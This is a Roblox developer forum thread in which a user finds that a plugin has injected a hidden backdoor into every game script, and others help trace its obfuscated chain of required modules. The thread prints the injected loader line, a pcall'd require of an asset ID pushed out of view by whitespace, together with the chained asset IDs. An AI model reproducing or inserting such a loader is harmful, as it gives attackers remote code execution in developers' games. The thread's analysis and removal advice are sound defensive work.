Backdoors in games

lexishh · June 30, 2020, 10:16am

I personally would post this in discussion but I don’t have the permissions.

Backdoors have been around on roblox for a few years and are becoming more and more used to break games, insert exploit capabilites, and theyre very stealthy too.

I recently have been working on a game only for it to be ruined by a plugin inserting backdoors into every single script in my game. My scripts now have this line of text:

--[[ --]]                                                  pcall(function()require(5045142580):Fire()end)

So I further looked into this, I got the module and it was just another require.

require(5189613560)

I looked in the library again for this other id, and as predicted, it’s another require

require(5151855975)

I then looked for this other id, and found the model that looks like it would be the main model that would break your game, no, it’s a getfenv, I couldn’t even scroll along, it would lag my studio, not my computer, so I copied the script into notepad and it was not lagging. I tried to read what on earth it was but it was just random letters, so I searched “getfenv” and “require”, nothing came up for require, but getfenv, yes,

Whoever writes these backdoors would not write all these random letters, they must be using some form of software to stop anyone from understanding it except your computer. Don’t judge me if I’m wrong, but I’m pretty sure theyre obsfuscating their backdoor. At this point I can’t do anything but report the items, which I recommend you all do too.

Links:

I hope this can help explain how some backdoors are really sneaky and can break your game. If I’m wrong anywhere, which I probably am, feel free to correct me and I’ll replace the text.

NOTE: I am not a professional scripter, I just am curious and this is all personal opinion and none of it should be trusted to be a fact.

sjr04 · June 30, 2020, 10:26am

The script is almost impossible to open. Are you able to post it in a pastebin so I can copy-paste it, so I can help you find out what it does more or less.

But if plugins are doing this you should check their source.

You can get plugin’s source by doing

game:GetObjects("rbxassetid://ID HERE")[1].Parent = workspace

and then inspecting it.

lexishh · June 30, 2020, 10:34am

The pastebin reaches the max limit of 500kb, I’ve tried on other sites, they have similar to the size limit.
However, I’ll upload a .txt file Backdoor.txt (1.1 MB)

starmaq · June 30, 2020, 10:48am

This script is so long my notepad is actually unable to open the file, holy. Ended up opening it online. Those random letters by the way are probably just obfuscation, to make the script confusing, hard to inspect, and impossible to back engineer.

It seems that whoever made this is making a reference to getfenv with a really weird name, that way you’re unable to see where it’s being used. They’re also dealing with _ENV? I guess the part of code that obfuscates global functions was copy pasted from a vanilla lua source or something.

But really, getfenv isn’t what you should be scared of. Only drawback is disabling luau’s optimizations I guess, which is not a big deal.

I couldn’t find anything else malicious, no loadstrings, I also couldn’t find the Fire() method they were using. Unless the file you sent was not the first module. In fact, I couldn’t find anything that is causing side-effects, which is really weird.

wevetments · June 30, 2020, 12:43pm

I dumped the constants of the script you uploaded and checked out the module scripts. It’s a backdoor bound to happen(or not? the module scripts probably got overwritten to hide the original code) as the module scripts are still empty. Once the childish person puts code in the module scripts, the code in them will get executed on the server.

lexishh · June 30, 2020, 1:22pm

Try scrolling along in the modulescripts.

wevetments · June 30, 2020, 1:29pm

I did. It eventually requires nothing but a truss part, which shouldn’t be possible nor cause any harm to your game. Am I missing something?

lexishh · June 30, 2020, 1:29pm

The truss part actually has a modulescript with it.

wevetments · June 30, 2020, 1:30pm

No, it doesn’t.

lexishh · June 30, 2020, 1:30pm

Try re insert the model, and group it.
I’d also not recommend opening the modulescript, it lags alot.

wevetments · June 30, 2020, 1:40pm

I still can’t get the module that comes with truss part to show up, but I’ll assume it was the file you uploaded above given you said this:

I mentioned above that I dumped the constants of the script and it seems to be a vm of some sort. It still would probably rely on the module scripts to contain more code to actually run something, but that wouldn’t matter at this point.

Just get rid of the whole thing

lexishh · June 30, 2020, 1:41pm

Yeah, I’ll just get rid of it lol.